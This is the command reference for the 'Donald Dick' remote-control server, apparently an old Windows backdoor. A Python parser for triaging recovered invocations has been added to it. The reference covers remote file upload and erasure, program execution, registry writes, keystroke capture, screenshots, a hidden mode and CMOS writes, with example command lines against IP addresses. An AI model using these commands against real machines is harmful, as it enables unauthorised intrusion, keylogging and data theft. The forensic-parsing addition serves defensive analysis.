DISCLAIMER:

The authors accept NO LIABILITY for damages of any kind caused by use of this
software. The authors make NO WARRANTY with respect to this software.
This software is provided "AS IS", and you, its user, assume the entire risk
as to its quality and accuracy.



Command line parameters:

<protocol> <address> <port> <options> <command> [<param1> <param2>...<paramN>]

where 

<protocol>:   0 - SPX, 1 - TCP
<address>:    target address; TCP example: 127.0.0.1; SPX example: 22FA6700B
<port>:       port (socket); 0 - use default (23476 for TCP, 0x9014 for SPX)
<options>:     d=N, where N is delay before execution, ms
               D=N, where N is delay after execution (has no meaning if repeat
                    count is unspecified or 1), ms
               r=N, where N is repeat count (result is sent back for the last
                    executed command only)
               p=X, where X is 32 characters of password; it is recommended
                    that this option be the last one in the string
<command>:    see below
<param1>...<paramN>: parameters if required


examples:

  get info (no password is required):

    client.exe 0 220482120A8 0 " " 0 info
    client.exe 1 212.20.33.8 " " 0 info

  upload file (no password is required):

    client.exe 1 212.20.33.8 " " 0 upload "c:\program files\e.exe" e.exe

  set binary value in the registry (no password is required):

    client.exe 0 220482120A8 0 " " 0 setregbin hklm\system\aaa test F01456

  set system colors (no password is required):

    client.exe 0 220482120A8 0 " " 0 setcolors "2 3" "255 0 0 128 128 0"

  open CDROM tray 10 times (assume that user will close it),
    delay before execution 20 s, delay after execution 120 s,
    no password is required:

    client.exe 0 220482120A8 0 "r=10 d=20000 D=120000" opencd

    The client waits for the reply to the last command, which takes a long
    time; you may Ctrl-Break it, the request will be executed anyway.
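
For triage of recovered command lines (shell history, process-creation logs),
the syntax above can be parsed mechanically. This is an added example, not part
of the original tool or its documentation; the function names and the sample
lines other than the opencd one are constructed for illustration.

```python
import shlex

# Protocol numbers and default ports from "Command line parameters" above.
PROTOCOLS = {"0": ("SPX", 0x9014), "1": ("TCP", 23476)}

# Command groups copied from the "Commands" list on this page.
GROUPS = {
    "server": "ECHO HIDDEN INFO PORT RAISE REGISTER SETPASS TERMINATE "
              "TESTFAR TESTNEAR UNINSTALL UPGRADE",
    "chat": "CHATCLR CHATRD CHATRDNV CHATSIZE CHATWR CHATWRNV",
    "filesystem": "CREATEDIR DIR DOWNLOAD ERASE GETDRIVES RCOPY REMOVEDIR "
                  "RENAME SETFTEQ SETFTIME UPLOAD",
    "processes": "FORGETALL GETPCLASS GETPID GETPROCLIST GETSUSPTHR GETTHRLIST "
                 "KILL KILLBYNAME KILLTHR RESUME RESUMEALL RUN SETPCLASS SUSPEND",
    "registry": "REGDELK REGDELV REGKEY REGNEWK REGSETBIN REGSETDWORD REGSETSZ "
                "REGVAL REGSETVAL",
    "system": "ANYCALL GETTIME LOGOFF POWEROFF REBOOT SETCOMPNAME SETTIME "
              "SHUTDOWN SPI SYSINFO",
    "keyboard": "KEYBSAVE KEYBUF KEYMAP KEYSTROKE",
    "windows": "CHILDWINDOWS GETCOLORS GETWINDOW HWNDDESKTOP SCREENSHOT "
               "SETCAPTION SETCOLORS WINDOWS WINMSG WINSHOT",
    "hardware": "RDCMOS WRCMOS",
    "jokes": "CLOSECD MONOFF MONON MSGBOX OPENCD PLAY",
}
COMMAND_GROUP = {c: g for g, names in GROUPS.items() for c in names.split()}


def parse_options(text):
    """Split the <options> string into delays, repeat count and a password flag."""
    opts = {"password_set": False}
    for item in text.split():
        key, sep, value = item.partition("=")
        if key == "p" and sep:
            opts["password_set"] = True   # record presence only, never the secret
        elif key in ("d", "D", "r") and value.isdigit():
            opts[key] = int(value)
    return opts


def parse_invocation(cmdline):
    """Return a triage record, or None if the line does not fit the syntax."""
    try:
        # posix=False keeps backslashes (Windows paths, registry keys) intact.
        tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:                    # unbalanced quotes
        return None
    if len(tokens) < 6 or tokens[1] not in PROTOCOLS:
        return None
    name, default_port = PROTOCOLS[tokens[1]]
    try:
        port = int(tokens[3], 0) or default_port   # 0 means "use default"
    except ValueError:
        return None
    command = tokens[5].upper()
    return {"protocol": name, "address": tokens[2], "port": port,
            "options": parse_options(tokens[4]), "command": command,
            "group": COMMAND_GROUP.get(command, "unknown"), "params": tokens[6:]}


# Sample lines: the first is from this page, the other two are constructed.
SAMPLES = [
    r'client.exe 0 220482120A8 0 "r=10 d=20000 D=120000" opencd',
    r'C:\tmp\c.exe 1 192.0.2.10 0 "p=0123456789abcdef0123456789abcdef" regsetsz hklm\software\x name v',
    r'notepad.exe report.txt',
]

if __name__ == "__main__":
    print(*map(parse_invocation, SAMPLES), sep="\n")
```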




Commands:


Server:

    ECHO, HIDDEN, INFO, PORT, RAISE, REGISTER, SETPASS,
    TERMINATE, TESTFAR, TESTNEAR, UNINSTALL, UPGRADE

Chat:
    CHATCLR, CHATRD, CHATRDNV, CHATSIZE, CHATWR, CHATWRNV

File system:

    CREATEDIR, DIR, DOWNLOAD, ERASE, GETDRIVES, RCOPY,
    REMOVEDIR, RENAME, SETFTEQ, SETFTIME, UPLOAD

Processes:

    FORGETALL, GETPCLASS, GETPID, GETPROCLIST, GETSUSPTHR, GETTHRLIST, KILL,
    KILLBYNAME, KILLTHR, RESUME, RESUMEALL, RUN, SETPCLASS, SUSPEND

Registry:

    REGDELK, REGDELV, REGKEY, REGNEWK, REGSETBIN,
    REGSETDWORD, REGSETSZ, REGVAL, REGSETVAL

System:

    ANYCALL, GETTIME, LOGOFF, POWEROFF, REBOOT, SETCOMPNAME, SETTIME,
    SHUTDOWN, SPI, SYSINFO

Keyboard:

    KEYBSAVE, KEYBUF, KEYMAP, KEYSTROKE

Windows:

    CHILDWINDOWS, GETCOLORS, GETWINDOW, HWNDDESKTOP, SCREENSHOT,
    SETCAPTION, SETCOLORS, WINDOWS, WINMSG, WINSHOT

Hardware:
    RDCMOS, WRCMOS

Jokes:

    CLOSECD, MONOFF, MONON, MSGBOX, OPENCD, PLAY


All:

ANYCALL <flags> <module name/selector> <function name/offset>
        [<param 1> [...<param N>]]

    -- not tested yet --
        Call any function - very cool but dangerous.
        A param may be immediate data (a number or an array) or may start
        with 'p'; in this case it is data and/or a buffer which the param
        points to. If a param contains only 'p' then the pointer is NULL.
        The API function is called inside the thread which processes the
        request.
        Flags:
        bit 0,1: 0 - use LoadLibrary( module name ),
                     GetProcAddress( function name) and perform near call,
                 1 - use offset (selector must be any value)
                     and perform near call,
                 2 - use selector, offset and perform far call.
        bit 2: params push order, 0 - right->left (C), 1 - left->right (PASCAL)
               if bits 4,5 are not zero then this bit is ignored.
        bit 3: who removes params from the stack, 0 - caller, 1 - callee.
        bit 4,5: register optimization (first params are passed in
               register set):
               0 - none,
           n/i 1 - Watcom C, the set is EAX, EDX, EBX, ECX or EDX:EAX, ECX:EBX,
           n/i 2 - Delphi, the set is EAX, EDX, ECX.
        bit 6: how to pass return value buffer's address for arrays:
               0 - Watcom C - address is passed in ESI
               1 - Delphi, when register optimization is used - address is
                   passed in the last register in the set if parameters count
                   less than 3 or in the first position on the stack;
                   if no optimization is set in bits 4,5 then address
                   is passed in the first position on the stack
        bit 8-31: buffer size to allocate on the stack for the return value;
               if zero then return value is expected in EDX:EAX and bit 6
               is ignored.

CHATCLR [<non-volatile flag>]              Clears chat room; if non-volatile
                                           flag is nonzero then non-volatile
                                           chat room is cleared
CHATRD [<index>]                           Reads messages from chat room
                                           starting with index or all of them
                                           if index is 0 or absent;
                                           message format: <index> <author>
                                           <date/time> <message>
                                           index of message is incremented
                                           continuously since the first
                                           message in the chat room, even if
                                           the room was cleared
CHATRDNV [<index>]                         same as CHATRD but operates with
                                           non-volatile room
CHATSIZE [<kilobytes>]                     Get/set chat room size, default
                                           size is 8K; chat room is cleared
CHATWR <message> [...<message>]            Add message(s) to the chat room
CHATWRNV <message> [...<message>]          same as CHATWR but operates with
                                           non-volatile room; non-volatile
                                           chat room is limited to 2K
CHILDWINDOWS <remote window handle>        Get child windows of window
CLOSECD
CREATEDIR <remote directory> [...<remote directory>]
                                           Note: returns as many result
                                           strings as parameters passed.
DIR <remote directory>                     Don't forget file mask!
DOWNLOAD <remote file> <local file>
ECHO                                       Server sends received packet back
ERASE <<force flag> <remote file/dir>> [...<<force flag> <remote file/dir>>]
                                           force flag: /0 or /1; /1 - erase
                                           file even read only or directory
                                           with all files and subdirectories.
                                           Note: returns as many strings as
                                           parameters passed.
FORGETALL                                  Clears suspended thread table
GETCOLORS <color indexes>                  Get system colors
GETDRIVES                                  Get list of drives
GETPCLASS <remote process id>              Get priority class
GETPID                                     Get server's process id
GETPROCLIST                                Get list of processes
GETSUSPTHR                                 Get list of suspended threads in
                                           the form: <process id> <thread id>
GETTHRLIST <remote process id>             Get list of threads for specified
                                           process
GETTIME                                    Returns date and time
GETWINDOW <window handle (hex)> <mode>     Returns window handle(s) relative
                                           to the given window (see Win32 API
                                           documentation on GetWindow()
                                           for <mode> description)
HIDDEN <0/1>                               hidden mode on/off
                                           in hidden mode the server does not
                                           reply to commands if an error
                                           occurred before their processing
                                           (reception, password verification,
                                           function code verification)
                                           Returns current mode
HWNDDESKTOP                                Returns desktop window handle
INFO                                       Returns some info
KEYBSAVE [<0/1>]    not implemented        without parameter or if that one
                                           is nonzero, saves current lookup
                                           table; if parameter is zero,
                                           clears saved table
KEYBUF [<keystrokes> [<from keystroke>]]   Returns captured scan codes;
                                           if <from keystroke> parameter is
                                           absent then returns last keystrokes;
                                           only the following scan codes are
                                           captured: 02..1C, 1E..29, 2B..35,
                                           37, 39, 47..53 and 9C, B5 - these
                                           codes denote extended keys with
                                           secondary scan codes 1C and 35
KEYMAP [<index newcode [...newcode]>       Remaps keys and returns current map;
       ...<index newcode [...newcode]>]      this command sets elements in
                                        lookup table;
                                        lookup table contains 256 scan codes in
                                        range 0..127; first half of table is
                                        used to remap regular keys, second one
                                        is used to remap extended keys (those
                                        keys produce two-byte scan codes, first
                                        code is E0);  normally,
                                        elements at indexes 0 and 128 have
                                        code 0, at 1 and 129 - 1 and so on;
                                        key is disabled if code is 0;
                                        note that it is impossible to remap
                                        pause/break key
KEYSTROKE <virtual key code> [...<virtual key code>]  simulates keystrokes
KILL <remote process id> [...<remote process id>]
                                           Note: returns as many result
                                           strings as parameters passed.
KILLBYNAME <remote executable file> [...<remote executable file>]
                                           Note: returns as many result
                                           strings as parameters passed.
KILLTHR <process id> <thread id> [...<thread id>]
                                           Kills thread(s) (under Win95 may
                                           not be done immediately)
                                           Note: returns as many result
                                           strings as thread ids passed.
LOGOFF                                     Performs logoff for workstation
MONOFF                                     Turns monitor off
MONON                                      Turns monitor on
MSGBOX <caption> <message> <flags (hex)>   Displays message box, see below 
                                           for the description of <flags>
OPENCD
PLAY <remote wave file>
PORT <protocol name> GET/[<port>...<port>] Get or set port numbers in registry,
                                           server must be restarted to
                                           apply changes; protocol name
                                           may be SPX or TCP; <port> is
                                           a number or D (default port)
                                           always returns port numbers
POWEROFF                                   Performs power off
RCOPY <source remote file> <destination remote file> [...<source remote file> <destination remote file>]
                                           Note: returns result string for
                                           each parameter pair.
RDCMOS <start> <count>           Reads CMOS data, start - index in range 0..255
RAISE                            Raises an exception - for debug purposes only
REBOOT
REGDELK <registry key> <subkey name>       Deletes subkey from the registry
REGDELV <registry key> <value name>        Deletes value from subkey
REGISTER [<registration data>]          Registers server
                                        Returns status in the first line,
                                        registration info in the second line,
                                        registration status in the third line
                                        if registration data is present
REGKEY <registry key>                   Displays subkeys in key
REGNEWK <registry key> <subkey name>    Creates new subkey
REGSETBIN <registry key> <value name> <value>    Sets binary value, value
                                        is the sequence of hex digits
                                        without any spaces
REGSETDWORD <registry key> <value name> <value>  Sets DWORD value
REGSETSZ <registry key> <value name> <value>     Sets string value
REGSETVAL <registry key> <value type (hex)> <value name> <value>
                                        Sets value of any type. Value
                                        is the sequence of hex digits
                                        without any spaces
REGVAL <registry key>                   Key must contain "hklm","hkus",
                                       "hkcu","hkcr" first
REMOVEDIR <remote directory> [...<remote directory>]
                                        Note: returns as many result
                                        strings as parameters passed.
RENAME <remote file name> <new remote file name> [...<remote file name> <new remote file name>]
                                        Note: returns result string for
                                        each parameter pair.
RESUME <process id> <thread id> [...<thread id>]
                                        Resumes thread(s)
                                        Note: returns as many result
                                        strings as thread ids passed.
RESUMEALL                               Resumes all suspended threads
RUN <remote executable file> [...<remote executable file>]
                                        Note: returns as many result
                                        strings as parameters passed.
SCREENSHOT [<pathname> [<param 1> [...<param N>]]]
SETCAPTION <window handle (hex)> <caption>
SETCOLORS <color indexes> <color values>
SETCOMPNAME <computer name>
SETFTEQU <remote file> <reference remote file> Sets date/time of file
                                               equal to reference file
SETFTIME <remote file> <H M S D M Y>
SETPASS [<password>]                      Sets or removes password
SETPCLASS <remote process id> <priority class> Set priority class
SETTIME <H M S D M Y>
SHUTDOWN
SPI <action> <uiparam> [<pvparam>]           Get/set system parameters info
SUSPEND <process id> <thread id> [...<thread id>]
                                             Suspends thread(s) (under Win95
                                             may not be done immediately;
                                             suspension means entering
                                             continuous loop so thread
                                             consumes cpu power)
                                             Note: returns as many result
                                             strings as thread ids passed.
SYSINFO
TERMINATE                                    Server terminates itself
TESTFAR               Returns far address of far test function - debug only
TESTNEAR              Returns near address of near test function - debug only
UNINSTALL             Completely uninstalls donald dick server
UPLOAD <remote file> <local file>
UPGRADE <remote file>                        restarts server anyway
WINDOWS                                      Get window list
WINMSG <window handle (hex)> <message> <wparam> <lparam>
                                             params may be numbers or may
                                             start with 'p'; in this case
                                             they are data and/or buffers
                                             which lparam and/or wparam
                                             points to
WINSHOT <window handle (hex)> [<pathname> [<param 1> [...<param N>]]]
                                             screenshot for the specified
                                             window or for the foreground
                                             window if handle is 0
WRCMOS <start> <count> <data>


-------------
Priority classes (hex):
  NORMAL_PRIORITY_CLASS       00000020
  IDLE_PRIORITY_CLASS         00000040
  HIGH_PRIORITY_CLASS         00000080
  REALTIME_PRIORITY_CLASS     00000100

Message box flags (hex):
  MB_OK                       00000000
  MB_OKCANCEL                 00000001
  MB_ABORTRETRYIGNORE         00000002
  MB_YESNOCANCEL              00000003
  MB_YESNO                    00000004
  MB_RETRYCANCEL              00000005
  MB_ICONHAND                 00000010
  MB_ICONQUESTION             00000020
  MB_ICONEXCLAMATION          00000030
  MB_ICONASTERISK             00000040
  MB_DEFBUTTON1               00000000
  MB_DEFBUTTON2               00000100
  MB_DEFBUTTON3               00000200
  MB_DEFBUTTON4               00000300
  MB_APPLMODAL                00000000
  MB_SYSTEMMODAL              00001000
  MB_TASKMODAL                00002000
  MB_HELP                     00004000
  MB_NOFOCUS                  00008000
  MB_SETFOREGROUND            00010000
  MB_DEFAULT_DESKTOP_ONLY     00020000
  MB_TOPMOST                  00040000
  MB_RIGHT                    00080000
  MB_RTLREADING               00100000

System color indexes:
  COLOR_SCROLLBAR              0
  COLOR_BACKGROUND             1
  COLOR_ACTIVECAPTION          2
  COLOR_INACTIVECAPTION        3
  COLOR_MENU                   4
  COLOR_WINDOW                 5
  COLOR_WINDOWFRAME            6
  COLOR_MENUTEXT               7
  COLOR_WINDOWTEXT             8
  COLOR_CAPTIONTEXT            9
  COLOR_ACTIVEBORDER          10
  COLOR_INACTIVEBORDER        11
  COLOR_APPWORKSPACE          12
  COLOR_HIGHLIGHT             13
  COLOR_HIGHLIGHTTEXT         14
  COLOR_BTNFACE               15
  COLOR_BTNSHADOW             16
  COLOR_GRAYTEXT              17
  COLOR_BTNTEXT               18
  COLOR_INACTIVECAPTIONTEXT   19
  COLOR_BTNHIGHLIGHT          20
  COLOR_3DDKSHADOW            21
  COLOR_3DLIGHT               22
  COLOR_INFOTEXT              23
  COLOR_INFOBK                24

Registry value types:

  REG_NONE                        0    No value type
  REG_SZ                          1    nul terminated string
  REG_EXPAND_SZ                   2    nul terminated string with
                                       environment variable references
  REG_BINARY                      3    Free form binary
  REG_DWORD                       4    32-bit number
  REG_DWORD_LITTLE_ENDIAN         4    32-bit number (same as REG_DWORD)
  REG_DWORD_BIG_ENDIAN            5    32-bit number
  REG_LINK                        6    Symbolic Link
  REG_MULTI_SZ                    7    Multiple strings
  REG_RESOURCE_LIST               8    Resource list in the resource map
  REG_FULL_RESOURCE_DESCRIPTOR    9    Resource list in the hardware description
  REG_RESOURCE_REQUIREMENTS_LIST 10

Virtual key codes:

  VK_LBUTTON        0x01
  VK_RBUTTON        0x02
  VK_CANCEL         0x03
  VK_MBUTTON        0x04
  VK_BACK           0x08
  VK_TAB            0x09
  VK_CLEAR          0x0C
  VK_RETURN         0x0D
  VK_SHIFT          0x10
  VK_CONTROL        0x11
  VK_MENU           0x12
  VK_PAUSE          0x13
  VK_CAPITAL        0x14
  VK_ESCAPE         0x1B
  VK_SPACE          0x20
  VK_PRIOR          0x21
  VK_NEXT           0x22
  VK_END            0x23
  VK_HOME           0x24
  VK_LEFT           0x25
  VK_UP             0x26
  VK_RIGHT          0x27
  VK_DOWN           0x28
  VK_SELECT         0x29
  VK_PRINT          0x2A
  VK_EXECUTE        0x2B
  VK_SNAPSHOT       0x2C
  VK_INSERT         0x2D
  VK_DELETE         0x2E
  VK_HELP           0x2F
  VK_0 thru VK_9 are the same as ASCII '0' thru '9' (0x30 - 0x39)
  VK_A thru VK_Z are the same as ASCII 'A' thru 'Z' (0x41 - 0x5A)
  VK_LWIN           0x5B
  VK_RWIN           0x5C
  VK_APPS           0x5D
  VK_NUMPAD0        0x60
  VK_NUMPAD1        0x61
  VK_NUMPAD2        0x62
  VK_NUMPAD3        0x63
  VK_NUMPAD4        0x64
  VK_NUMPAD5        0x65
  VK_NUMPAD6        0x66
  VK_NUMPAD7        0x67
  VK_NUMPAD8        0x68
  VK_NUMPAD9        0x69
  VK_MULTIPLY       0x6A
  VK_ADD            0x6B
  VK_SEPARATOR      0x6C
  VK_SUBTRACT       0x6D
  VK_DECIMAL        0x6E
  VK_DIVIDE         0x6F
  VK_F1             0x70
  VK_F2             0x71
  VK_F3             0x72
  VK_F4             0x73
  VK_F5             0x74
  VK_F6             0x75
  VK_F7             0x76
  VK_F8             0x77
  VK_F9             0x78
  VK_F10            0x79
  VK_F11            0x7A
  VK_F12            0x7B
  VK_F13            0x7C
  VK_F14            0x7D
  VK_F15            0x7E
  VK_F16            0x7F
  VK_F17            0x80
  VK_F18            0x81
  VK_F19            0x82
  VK_F20            0x83
  VK_F21            0x84
  VK_F22            0x85
  VK_F23            0x86
  VK_F24            0x87
  VK_NUMLOCK        0x90
  VK_SCROLL         0x91
  VK_LSHIFT         0xA0
  VK_RSHIFT         0xA1
  VK_LCONTROL       0xA2
  VK_RCONTROL       0xA3
  VK_LMENU          0xA4
  VK_RMENU          0xA5
  VK_PROCESSKEY     0xE5
  VK_ATTN           0xF6
  VK_CRSEL          0xF7
  VK_EXSEL          0xF8
  VK_EREOF          0xF9
  VK_PLAY           0xFA
  VK_ZOOM           0xFB
  VK_NONAME         0xFC
  VK_PA1            0xFD
  VK_OEM_CLEAR      0xFE

Plugin parameters for SCREEN/WINSHOT: [<pathname> [<param 1> [...<param N>]]]
  Standard JPEG plugin: filename jpegcomp.dll, param 1 - image
  quality, 1-100, default is 75.

------------------------------------------------------------------
Send all questions, comments and suggestions to donalddick@mail.ru
